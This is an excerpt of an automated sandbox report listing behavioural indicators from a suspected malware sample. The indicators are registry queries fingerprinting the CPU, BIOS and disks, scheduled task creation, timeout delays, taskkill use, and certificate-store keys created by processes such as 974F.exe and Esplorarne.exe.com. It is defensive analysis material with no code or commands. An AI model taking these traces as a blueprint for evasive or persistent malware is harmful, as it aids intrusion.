| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
